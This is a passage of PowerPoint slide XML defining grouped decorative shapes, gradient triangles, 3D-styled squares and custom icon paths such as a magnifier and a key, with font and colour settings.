            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
